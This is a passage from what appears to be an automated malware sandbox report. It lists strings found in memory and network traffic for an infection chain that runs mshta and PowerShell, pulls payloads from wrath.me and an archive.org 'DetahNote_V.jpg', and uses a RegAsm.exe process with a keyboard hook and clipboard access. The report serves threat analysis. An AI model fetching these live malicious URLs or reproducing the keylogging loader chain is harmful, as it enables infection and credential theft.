0000001D.00000002.594996532.000000001C38A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452480910.0000000000272000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.593504050.000000001ABBC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                    Source: powershell.exe, 00000007.00000002.453491405.0000000002451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.553505468.000000000239F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.473005129.0000000002311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.494874589.0000000002331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.598837287.000000000255B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.517043980.00000000022F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452480910.0000000000272000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.593504050.000000001ABBC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C38A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000018.00000002.483636245.00000000009C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                    Source: RegAsm.exe, 00000018.00000002.483291462.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/GK
                    Source: RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://www.msn.com/
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                    Source: RegAsm.exe, 00000015.00000002.485996514.00000000003E3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                    Source: RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://contextual.media.net/
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                    Source: powershell.exe, 00000007.00000002.458200384.0000000012481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000007.00000002.458200384.0000000012481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000007.00000002.458200384.0000000012481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                    Source: powershell.exe, 0000000E.00000002.473005129.0000000002512000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.517043980.00000000024F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org
                    Source: powershell.exe, 0000000C.00000002.553505468.0000000002854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.598837287.0000000002A21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org/32/it
                    Source: powershell.exe, 0000001D.00000002.517043980.0000000002BDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot
                    Source: powershell.exe, 0000001D.00000002.517043980.00000000024F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg
                    Source: powershell.exe, 0000000E.00000002.473005129.0000000002512000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.517043980.00000000024F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgX
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                    Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: powershell.exe, 00000007.00000002.458200384.0000000012481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C31F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C100000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488297453.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473378608.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487926229.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C386000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C38A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.593504050.000000001AB50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442807206.00000000032C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487881018.0000000003955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488616620.0000000003955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/
                    Source: mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me//
                    Source: mshta.exe, 0000000F.00000002.488297453.000000000026A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmp, QPS-36477.xls, 58430000.0.dr, logs.dat.17.drString found in binary or memory: https://wrath.me/EhYykL
                    Source: mshta.exe, 00000004.00000002.442405393.000000000040A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/EhYykL/
                    Source: mshta.exe, 00000004.00000002.442405393.000000000040A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/EhYykL1(
                    Source: mshta.exe, 0000000F.00000002.488297453.000000000026A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/EhYykLi
                    Source: mshta.exe, 0000000F.00000002.488297453.000000000026A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/EhYykLm
                    Source: mshta.exe, 0000000F.00000003.475534357.00000000039BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.00000000039BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.00000000039BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/EhYykLr.htax
                    Source: mshta.exe, 00000004.00000002.442847727.0000000003328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.0000000003328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/EhYykLr.htay(
                    Source: mshta.exe, 00000004.00000002.442405393.000000000040A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/EhYykLs#
                    Source: mshta.exe, 00000004.00000002.442452182.0000000000480000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440469832.0000000000480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/_
                    Source: mshta.exe, 0000000F.00000002.488297453.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473378608.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487926229.00000000002A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/bu
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                    Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49170 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49169 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000030_2_0040A2F3
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0041183A OpenClipboard,GetLastError,21_2_0041183A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,21_2_0040987A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,21_2_004098E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,23_2_00406DFC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,23_2_00406E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,24_2_004068B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,24_2_004072B5
